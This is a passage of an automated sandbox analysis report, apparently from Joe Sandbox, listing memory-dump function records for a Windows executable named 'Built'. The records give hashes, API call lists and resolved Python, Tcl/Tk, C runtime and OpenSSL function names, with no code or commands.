                                                              • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                              • Instruction Fuzzy Hash: 9A419121A0CA8395EE309B25EC641B96364FB94794F800236D69DC36C4DF7ED54ADF43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$FileFind$00007ErrorF020FirstLastNext
                                                              • String ID:
                                                              • API String ID: 1171239525-0
                                                              • Opcode ID: b84a2f744cee5a13916b1079a4c81b9897484e08d179ab741295abe408a7cb8c
                                                              • Instruction ID: 03755dddcac558e8441371d45a171186d814b11fc610719c4b1fb68190b38cbc
                                                              • Opcode Fuzzy Hash: b84a2f744cee5a13916b1079a4c81b9897484e08d179ab741295abe408a7cb8c
                                                              • Instruction Fuzzy Hash: 6FB1C632B04A8286EB108FA5D465A7977A8FF59BA4F544335DABD837D8EF3CD0458300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 836932d6aed314119f7ddbe256598baef3b0bd20caf5fb751809a6c17d89e7ea
                                                              • Instruction ID: 771e7dde8e166d8bec7d4528e78cc3a507dce73541a428a1b858dc762430242c
                                                              • Opcode Fuzzy Hash: 836932d6aed314119f7ddbe256598baef3b0bd20caf5fb751809a6c17d89e7ea
                                                              • Instruction Fuzzy Hash: B4315072708B8286EB609F61E860BED37A5FB84748F484039DB5D47AC8DF38D548CB10
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2109405337.00007FFE101D1000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFE101D0000, based on PE: true
                                                              • Associated: 00000005.00000002.2109058392.00007FFE101D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109405337.00007FFE101E5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109475898.00007FFE101E6000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                              • Associated: 00000005.00000002.2109504920.00007FFE101E8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffe101d0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 1e09e7e5a03c670904396550837b2b7c286354a323edf1151ea734ff63ee77c8
                                                              • Instruction ID: 874a2c17584115373a595f499c0e7e58acd073a5a95152fc88af5b7dc691922b
                                                              • Opcode Fuzzy Hash: 1e09e7e5a03c670904396550837b2b7c286354a323edf1151ea734ff63ee77c8
                                                              • Instruction Fuzzy Hash: 48313872709E818AEB609F61E8443E97365FB84754F84443ADB8E47BA8DF3CD649C710
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                              • Instruction ID: c40da157341b93ed3d445747ff0f812bf0ff7450512b2b97c9b108885229dc9c
                                                              • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                              • Instruction Fuzzy Hash: CF312F72A08B8286EB609F60EC503EE73A4FB84744F44443ADA4D87B94EF7DD558DB12
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF626665CB5
                                                                • Part of subcall function 00007FF626665608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666561C
                                                                • Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
                                                                • Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8
                                                                • Part of subcall function 00007FF62665A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62665A94F,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665A979
                                                                • Part of subcall function 00007FF62665A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62665A94F,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665A99E
                                                              • _get_daylight.LIBCMT ref: 00007FF626665CA4
                                                                • Part of subcall function 00007FF626665668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666567C
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F1A
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F2B
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F3C
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62666617C), ref: 00007FF626665F63
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                              • String ID:
                                                              • API String ID: 4070488512-0
                                                              • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                              • Instruction ID: ae37007ee07be871dcb339d4716e81cd2b541fbdac04316a19f48e672b003f8e
                                                              • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                              • Instruction Fuzzy Hash: 43D1AF32A0824386EF20AF26EC521B96751FF84794F548136EA0DC7696DF3EE441EB43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                              • Instruction ID: a497083f80058113b1f8584c5be63a6774796f2cb0a83ccd19c71a0369f9f8ab
                                                              • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                              • Instruction Fuzzy Hash: 52315136618B8286DB60CF25EC402AE73A4FB89754F540136EA8D87B99EF3DD155CB02
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 2227656907-0
                                                              • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                              • Instruction ID: 734c62f0ad5f04801d570b3fb5f6f8de8eb7da419233af1154954f4c061cf61f
                                                              • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                              • Instruction Fuzzy Hash: 58B1B522F1869741EE609B2AED101BDA390FB44BE4F445131EA5E87B85EE3EE445DB03
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F1A
                                                                • Part of subcall function 00007FF626665668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666567C
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F2B
                                                                • Part of subcall function 00007FF626665608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666561C
                                                              • _get_daylight.LIBCMT ref: 00007FF626665F3C
                                                                • Part of subcall function 00007FF626665638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666564C
                                                                • Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
                                                                • Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62666617C), ref: 00007FF626665F63
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                              • String ID:
                                                              • API String ID: 3458911817-0
                                                              • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                              • Instruction ID: 643c3a2fa5c58860cd54c0ea30182ad44a7f2ba777dd2e4a7e05ff81bd42bf5e
                                                              • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                              • Instruction Fuzzy Hash: 4E51A232A0864386EB10DF32FD915A96760FB88784F444136EA4DC76A6DF3EE4449F83
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090834885.00007FFDF0FA1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFDF0FA0000, based on PE: true
                                                              • Associated: 00000005.00000002.2090802749.00007FFDF0FA0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1004000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1050000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF1053000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10AC000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10B1000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090834885.00007FFDF10B4000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091138354.00007FFDF10B5000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091174931.00007FFDF10B7000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf0fa0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: 0
                                                              • API String ID: 3568877910-4108050209
                                                              • Opcode ID: 6a50bf60ee250f00c13c9b161c7141ec869bdc7ae2f0f3317bdfd56e8a990b19
                                                              • Instruction ID: 825cf3deb4bd9dda2932af2feaa21d465a643a235176ebb762816500b4da5d4c
                                                              • Opcode Fuzzy Hash: 6a50bf60ee250f00c13c9b161c7141ec869bdc7ae2f0f3317bdfd56e8a990b19
                                                              • Instruction Fuzzy Hash: 57F1AE72F0C66286EB648B15956CE7A23A5FFD5B60F050235EA6E8B7C8DF6CE441C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastbind
                                                              • String ID: ..\s\crypto\bio\b_sock2.c
                                                              • API String ID: 2328862993-3200932406
                                                              • Opcode ID: c767e834a84740a79c233dcad0d39ea44b2e2a28cfc1136448b175a4500b188a
                                                              • Instruction ID: 9f3b8e0523d0742b9c06201be8e88a3aa304ec0fa46a1a5faae3cb7fd725449c
                                                              • Opcode Fuzzy Hash: c767e834a84740a79c233dcad0d39ea44b2e2a28cfc1136448b175a4500b188a
                                                              • Instruction Fuzzy Hash: 84219F32F1815286E710DB26E820AAD6768FB81B98F504235EA6D43BDDDF3DE546DF00
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645830
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645842
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645879
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664588B
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458A4
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458B6
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458CF
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458E1
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458FD
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664590F
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664592B
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664593D
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645959
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664596B
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645987
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645999
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266459B5
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266459C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorLastProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                              • API String ID: 199729137-653951865
                                                              • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                              • Instruction ID: a3537bc7702626fedf611ebc0086da936d06d572064df9dc0e86523033db434b
                                                              • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                              • Instruction Fuzzy Hash: 1822C124A0EF47E2FE249B65BD241B427A5BF45785F445036C82E82260FF7EB158BB43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorLastProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                              • API String ID: 199729137-3427451314
                                                              • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                              • Instruction ID: 52a1b502162a3df9c55faab5425b307457f37b133d1d81136829d0f8869aa4da
                                                              • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                              • Instruction Fuzzy Hash: 4902E520A0DB0BD1FE249B66BD205B42BB5BF55794F441031C81E822A0EFBEB558FB53
